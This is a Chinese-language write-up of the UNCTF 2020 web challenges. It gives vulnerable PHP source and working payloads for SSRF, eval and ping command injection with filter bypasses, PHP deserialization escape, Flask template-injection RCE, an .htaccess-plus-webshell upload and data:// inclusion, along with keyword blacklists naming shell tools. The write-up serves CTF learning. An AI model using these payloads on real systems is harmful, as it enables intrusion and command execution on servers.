时间:2020年11月7日-11月14日

题目来源:UNCTF

easy_ssrf

<?php
echo'<center><strong>welc0me to 2020UNCTF!!</strong></center>';
highlight_file(__FILE__);
$url = $_GET['url'];
if(preg_match('/unctf\.com/',$url)){
    if(!preg_match('/php|file|zip|bzip|zlib|base|data/i',$url)){
        $url=file_get_contents($url);
        echo($url);
    } else {
        echo('error!!');
    }
}else{
    echo("error");
}
?>

payload:

?url=unctf.com%../../../../../flag

提示:url的语法,例如%#符号的使用等

babyeval

// flag在flag.php
if(isset($_GET['a'])){
    if(preg_match('/\(.*\)/', $_GET['a']))
        die('hacker!!!');
    ob_start(function($data){
             if (strpos($data, 'flag') !== false)
             return 'ByeBye hacker';
             return false;
             });
    eval($_GET['a']);
} else {
    highlight_file(__FILE__);
}
?> 

payload:

?a=echo `cat flag.php | base64`

payload2:

?a=include 'php://filter/read/convert.base64-encode/resource=./flag.php'

easyunserialize

<?php
error_reporting(0);
highlight_file(__FILE__);
​
class a
{
    public $uname;
    public $password;
    public function __construct($uname,$password)
    {
        $this->uname=$uname;
        $this->password=$password;
    }
    public function __wakeup()
    {
            if($this->password==='easy')
            {
                include('flag.php');
                echo $flag;    
            }
            else
            {
                echo 'wrong password';
            }
        }
    }
​
function filter($string){
    return str_replace('challenge','easychallenge',$string);
}
​
$uname=$_GET[1];
$password=1;
$ser=filter(serialize(new a($uname,$password)));
$test=unserialize($ser);
?>

payload:

?1=challengechallengechallengechallengechallengechallengechallengechallenge";s:8:"password";s:4:"easy";}111

提示:反序列化字符串的逃逸

ezphp

<?php
show_source(__FILE__);
$username  = "admin";
$password  = "password";
include("flag.php");
$data = isset($_POST['data'])? $_POST['data']: "" ;
$data_unserialize = unserialize($data);
if ($data_unserialize['username']==$username&&$data_unserialize['password']==$password){
    echo $flag;
}else{
    echo "username or password error!";
}

payload:

POST:data=a:2:{s:8:"username";b:1;s:8:"password";b:1;}

提示:php弱类型比较

easyflask

题目走起来有登陆与注册,直接注册admin/admin,然后回到首页会回显secret_route_you_do_not_know页面

进入页面叫你猜测?guess=

发现这里存在SSTI漏洞(之前还爆破了很久SECRIT_KEY)

这里的SSTI过滤了:

[ ] ' " _

这里过滤的下划线可以用|attr(request.args.cla)来绕过

过滤的单双引号用request.args.a来绕过,并传递GET参数

过滤的大括号[]可以用.pop(1)或者__getitem__来绕过,一定注意python中访问这些子类,还有属性,还有字典的键值的方式,不然很容易出错!!(我就是在这里搞了半天)

这里利用的链:

().__class__.__bases__.__subclasses__.[166](warnings.catch_warnings).__init__.__globals__['__builtins__']['eval']("__import__('os').popen('cat%20flag.txt').read()")

payload:

{{(((()|attr(request.args.cla)|attr(request.args.bas)|list).pop(0))|attr(request.args.sub)()).pop(166)|attr(request.args.ini)|attr(request.args.glo)|attr(request.args.geti)(request.args.bui)|attr(request.args.geti)(request.args.ii)(request.args.hh)}}&cla=__class__&bas=__bases__&sub=__subclasses__&ini=__init__&glo=__globals__&bui=__builtins__&hh=__import__('os').popen('cat flag.txt').read()&ii=eval&geti=__getitem__

放几篇文章:(实际上我翻了N篇)

https://www.mi1k7ea.com/2019/05/31/Python沙箱逃逸小结/

https://www.secpulse.com/archives/115367.html

UN's_online_tools

打开是一个老online-tool了,功能是ping给定的ip

首先的思路一定是fuzz一下看看ban了哪些符号,bp测试了一下,ban掉了以下符号:

$
&
*
{
]
;
'
>
空格

接下来用管道符号ls一下:|ls,发现可以回显index.php

然后绕过一下空格,这里用的是%09,过滤了cat用反斜杠绕一下

看一下源码:|ca\t%09index.php

<!doctype html>
<html>
    <head>
        <meta charset='utf-8'>
        <title>Login</title>
        <link rel="stylesheet" href="style.css">
    </head>
    <body>
        <div class="box">
            <h2>PING</h2>
            <h4>其他功能待开发</h4>
            <form action="./index.php" method="get">
                <div class="inputBox">
                    <input type="text" name="url" required="">
                    <label>Url</label>
                </div>
                <input type="submit" name="GO" value="GO">
            </form>
            <br>
            <?php
            if (isset($_GET['url'])){
                $ip=$_GET['url'];
                if(preg_match("/(;|'| |>|]|&| |\\$|\\|rev|more|tailf|head|nl|tail|tac|cat|rm|cp|mv|\*|\{)/i", $ip)){
                    die("<strong><center>非法字符</center></strong>");
                }
                if(preg_match("/.*f.*l.*a.*g.*/", $ip)){
                    die("<strong><center>非法字符</center></strong>");
                }
                $a = shell_exec("ping -c 4 ".$ip);
                echo($a);
            }else{
                echo "<script>alert('欢迎来到UN`s online tools 如果师傅觉得题目不适合您,可以出门左拐')</script>";
            }
            ?>
        </div>
    </body>
</html>

这一下过滤的东西就清楚了,过滤了flag可以用?来过滤

payload:

|ca\t%09/f???

回显可以看到flag

easy_upload

文件上传,文件名字是过滤完了的,只能上传图片文件,但是上传之后文件名不会变,所以考虑htacess

上传.htaccess:

POST /index.php HTTP/1.1
Host: 164003d7-9b83-484e-af2a-c400e62a742e.node3.hackingfor.fun
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:83.0) Gecko/20100101 Firefox/83.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Content-Type: multipart/form-data; boundary=---------------------------3533994738563832533554341631
Content-Length: 378
Origin: http://f73adc3f-29f5-41ba-b49b-4f2850b0cb13.node3.hackingfor.fun
Connection: close
Referer: http://f73adc3f-29f5-41ba-b49b-4f2850b0cb13.node3.hackingfor.fun/
Upgrade-Insecure-Requests: 1

-----------------------------3533994738563832533554341631
Content-Disposition: form-data; name="fileUpload"; filename=".htaccess"
Content-Type: image/jpeg

SetHandler application/x-httpd-p\
hp

-----------------------------3533994738563832533554341631
Content-Disposition: form-data; name="upload"

submit
-----------------------------3533994738563832533554341631--

这里过滤了文件内容:perl|pyth|ph|auto|curl|base|\|>|rm|ryby|openssl|war|lua|msf|xter|telnet in contents!

POST /index.php HTTP/1.1
Host: 164003d7-9b83-484e-af2a-c400e62a742e.node3.hackingfor.fun
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:83.0) Gecko/20100101 Firefox/83.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Content-Type: multipart/form-data; boundary=---------------------------3533994738563832533554341631
Content-Length: 359
Origin: http://f73adc3f-29f5-41ba-b49b-4f2850b0cb13.node3.hackingfor.fun
Connection: close
Referer: http://f73adc3f-29f5-41ba-b49b-4f2850b0cb13.node3.hackingfor.fun/
Upgrade-Insecure-Requests: 1

-----------------------------3533994738563832533554341631
Content-Disposition: form-data; name="fileUpload"; filename="a.jpg"
Content-Type: image/jpeg

<?=system("cat /flag");

-----------------------------3533994738563832533554341631
Content-Disposition: form-data; name="upload"

submit
-----------------------------3533994738563832533554341631--

访问a.jpg即可!

ezfind

这题我也非预期了。。。。

是在做不出来的时候,我打开了bp,把所有fuzz的payload加上,结果出来了。。。人傻了

爆破出来的payload末尾有%00,所以简短的payload可以如下:

name=%00

赛后复现,发现传入数组或者%00时,is_file函数会返回null
不愧是最好的语言!

L0vephp

比赛的时候没做出来,没找到入口,赛后star师傅提示,?action

首先文件包含绕过读取flag.php:

php://filter/read=convert.quoted-printable-encode/resource=flag.php

进入1nD3x.php:

在flag.php里面发现一个虚假的flag,然后提示1nD3x.php

<?php 


error_reporting(0);
show_source(__FILE__);
$code=$_REQUEST['code'];

$_=array('@','\~','\^','\&','\?','\<','\>','\*','\`','\+','\-','\'','\"','\\\\','\/'); 
$__=array('eval','system','exec','shell_exec','assert','passthru','array_map','ob_start','create_function','call_user_func','call_user_func_array','array_filter','proc_open');
$blacklist1 = array_merge($_);
$blacklist2 = array_merge($__);

if (strlen($code)>16){
    die('Too long');
}

foreach ($blacklist1 as $blacklisted) { 
    if (preg_match ('/' . $blacklisted . '/m', $code)) { 
        die('WTF???'); 
    } 
} 

foreach ($blacklist2 as $blackitem) {
    if (preg_match ('/' . $blackitem . '/im', $code)) {
        die('Sry,try again');
    }
}

@eval($code);
?>

可以看到过滤了很多符号还有命令执行函数,还有16个字符限制,这里可以用payload简单的看到phpinfo()页面:

?code=${phpinfo()};

可以看到一个很重要的信息:

allow_url_fopen	        On      On
allow_url_include	On	On

考虑一下文件包含执行命令,payload:

?code=include$_GET[1];&1=data://text/plain,<?php%20system("cat%20/flag_mdnrvvldb");?>

这里flag改了名字,怪说不得找不到flag,先ls /一下就好了


我啥也不会!